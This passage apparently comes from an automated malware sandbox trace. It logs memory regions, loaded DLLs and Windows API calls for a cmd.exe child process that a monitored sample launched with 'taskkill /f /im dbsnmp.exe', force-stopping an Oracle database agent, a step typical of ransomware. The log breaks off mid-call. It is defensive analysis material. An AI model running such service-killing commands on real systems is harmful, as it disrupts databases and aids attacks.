"\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 1995 start_va = 0x6cc30000 end_va = 0x6cc96fff monitored = 0 entry_point = 0x6cc4b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 1996 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1997 start_va = 0x6cbe0000 end_va = 0x6cc23fff monitored = 0 entry_point = 0x6cbfaaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 1998 start_va = 0x61c0000 end_va = 0x61fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000061c0000" filename = "" Region: id = 1999 start_va = 0x6200000 end_va = 0x623ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006200000" filename = "" Region: id = 2000 start_va = 0x6240000 end_va = 0x627ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006240000" filename = "" Region: id = 2001 start_va = 0x6280000 end_va = 0x62bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006280000" filename = "" Region: id = 2002 start_va = 0x62c0000 end_va = 0x62fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062c0000" filename = "" Region: id = 2003 start_va = 0x6300000 end_va = 0x633ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006300000" filename = "" Region: id = 2004 start_va = 0x6cbc0000 end_va = 0x6cbd0fff monitored = 0 entry_point = 0x6cbc8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 2005 start_va = 0x6c8e0000 end_va = 0x6c99efff monitored = 0 entry_point = 0x6c911e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 2006 start_va = 0x6340000 end_va = 0x6345fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006340000" filename = "" Thread: id = 162 os_tid = 0x58c Thread: id = 163 os_tid = 0xdf0 Thread: id = 164 os_tid = 0x3a8 Thread: id = 165 os_tid = 0x784 Thread: id = 166 os_tid = 0x380 Thread: id = 167 os_tid = 0xc6c Process: id = "22" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x33132000" os_pid = "0xef8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"taskkill /f /im dbsnmp.exe \"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2009 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2010 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2011 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2012 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2013 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2014 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2015 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2016 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2017 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2018 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 2019 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 2020 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2021 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2022 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2023 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2024 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 2025 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2026 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 2027 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 2028 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2029 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2030 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2031 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2032 start_va = 0x450000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 2033 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2034 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2035 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2036 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2037 start_va = 0x600000 end_va = 0x6bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2038 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2039 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2040 start_va = 0x6c0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 2041 start_va = 0x7c0000 end_va = 0x9affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 2042 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2043 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2044 start_va = 0x9b0000 end_va = 0xce6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 168 os_tid = 0xd18 [0157.793] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0157.793] __set_app_type (_Type=0x1) [0157.793] __p__fmode () returned 0x74974d6c [0157.793] __p__commode () returned 0x74975b1c [0157.793] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0157.793] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0157.794] GetCurrentThreadId () returned 0xd18 [0157.794] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd18) returned 0x78 [0157.794] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0157.794] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0157.794] SetThreadUILanguage (LangId=0x0) returned 0x409 [0157.802] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0157.802] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0157.803] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0157.803] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0157.804] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0157.804] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0157.804] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0157.804] GetConsoleOutputCP () returned 0x1b5 [0157.806] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0157.806] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0157.807] _get_osfhandle (_FileHandle=1) returned 0x154 [0157.807] SetConsoleMode (hConsoleHandle=0x154, dwMode=0x0) returned 0 [0157.807] _get_osfhandle (_FileHandle=1) returned 0x154 [0157.807] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0157.807] _get_osfhandle (_FileHandle=0) returned 0x144 [0157.807] GetConsoleMode (in: hConsoleHandle=0x144, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0157.807] GetEnvironmentStringsW () returned 0x507cc0* [0157.807] GetProcessHeap () returned 0x500000 [0157.807] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0xa1a) returned 0x5086e8 [0157.807] FreeEnvironmentStringsA (penv="A") returned 1 [0157.807] GetProcessHeap () returned 0x500000 [0157.807] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x4) returned 0x500550 [0157.807] GetEnvironmentStringsW () returned 0x507cc0* [0157.807] GetProcessHeap () returned 0x500000 [0157.807] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0xa1a) returned 0x509110 [0157.807] FreeEnvironmentStringsA (penv="A") returned 1 [0157.807] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0157.808] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0157.808] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0157.808] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0157.808] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0157.808] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0157.808] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0157.808] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0157.808] RegCloseKey (hKey=0x88) returned 0x0 [0157.808] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0157.808] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0157.808] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0157.808] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0157.808] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0157.808] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0157.809] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0157.809] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0157.809] RegCloseKey (hKey=0x88) returned 0x0 [0157.809] time (in: timer=0x0 | out: timer=0x0) returned 0x6234420c [0157.809] srand (_Seed=0x6234420c) [0157.809] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im dbsnmp.exe \"" [0157.809] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im dbsnmp.exe \"" [0157.809] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0157.809] GetProcessHeap () returned 0x500000 [0157.809] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x210) returned 0x509b38 [0157.809] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x509b40, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0157.809] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0157.809] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0157.809] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0157.810] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0157.810] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0157.810] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0157.810] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0157.810] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0157.810] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0157.810] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0157.810] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0157.810] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0157.810] GetProcessHeap () returned 0x500000 [0157.811] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x5086e8) returned 1 [0157.811] GetEnvironmentStringsW () returned 0x507cc0* [0157.811] GetProcessHeap () returned 0x500000 [0157.811] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0xa32) returned 0x50a790 [0157.811] FreeEnvironmentStringsA (penv="A") returned 1 [0157.811] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0157.812] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0157.812] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0157.812] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0157.812] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0157.812] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0157.812] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0157.812] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0157.812] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0157.812] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0157.812] GetProcessHeap () returned 0x500000 [0157.812] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x44) returned 0x5005c8 [0157.812] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0157.812] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0157.812] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0157.812] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x500618 [0157.812] FindClose (in: hFindFile=0x500618 | out: hFindFile=0x500618) returned 1 [0157.813] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x500618 [0157.813] FindClose (in: hFindFile=0x500618 | out: hFindFile=0x500618) returned 1 [0157.813] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0157.813] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x500618 [0157.813] FindClose (in: hFindFile=0x500618 | out: hFindFile=0x500618) returned 1 [0157.813] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0157.813] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0157.813] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0157.813] GetProcessHeap () returned 0x500000 [0157.814] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x50a790) returned 1 [0157.814] GetEnvironmentStringsW () returned 0x507cc0* [0157.814] GetProcessHeap () returned 0x500000 [0157.815] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0xa76) returned 0x509d50 [0157.815] FreeEnvironmentStringsA (penv="=") returned 1 [0157.815] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0157.815] GetProcessHeap () returned 0x500000 [0157.816] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x5005c8) returned 1 [0157.816] GetProcessHeap () returned 0x500000 [0157.816] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x400e) returned 0x50bc50 [0157.817] GetProcessHeap () returned 0x500000 [0157.817] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x48) returned 0x50a7d0 [0157.817] GetProcessHeap () returned 0x500000 [0157.817] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x4008) returned 0x50fc68 [0157.818] GetProcessHeap () returned 0x500000 [0157.818] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x4008) returned 0x513c78 [0157.820] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0157.821] GetProcessHeap () returned 0x500000 [0157.821] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x418) returned 0x50a820 [0157.822] SetErrorMode (uMode=0x0) returned 0x8003 [0157.822] SetErrorMode (uMode=0x1) returned 0x0 [0157.822] GetFullPathNameW (in: lpFileName="taskkill \\f \\.", nBufferLength=0x208, lpBuffer=0x50a828, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f", lpFilePart=0x19fbac*="f") returned 0x29 [0157.822] SetErrorMode (uMode=0x8003) returned 0x1 [0157.822] GetProcessHeap () returned 0x500000 [0157.822] RtlReAllocateHeap (Heap=0x500000, Flags=0x0, Ptr=0x50a820, Size=0x7a) returned 0x50a820 [0157.822] GetProcessHeap () returned 0x500000 [0157.822] RtlSizeHeap (HeapHandle=0x500000, Flags=0x0, MemoryPointer=0x50a820) returned 0x7a [0157.823] NeedCurrentDirectoryForExePathW (ExeName="taskkill \\f \\.") returned 1 [0157.823] GetProcessHeap () returned 0x500000 [0157.823] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x62) returned 0x50a8a8 [0157.823] GetProcessHeap () returned 0x500000 [0157.823] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0xb8) returned 0x50a918 [0157.823] GetProcessHeap () returned 0x500000 [0157.823] RtlReAllocateHeap (Heap=0x500000, Flags=0x0, Ptr=0x50a918, Size=0x62) returned 0x50a918 [0157.823] GetProcessHeap () returned 0x500000 [0157.823] RtlSizeHeap (HeapHandle=0x500000, Flags=0x0, MemoryPointer=0x50a918) returned 0x62 [0157.823] GetEnvironmentVariableW (in: lpName="PATHEXT", 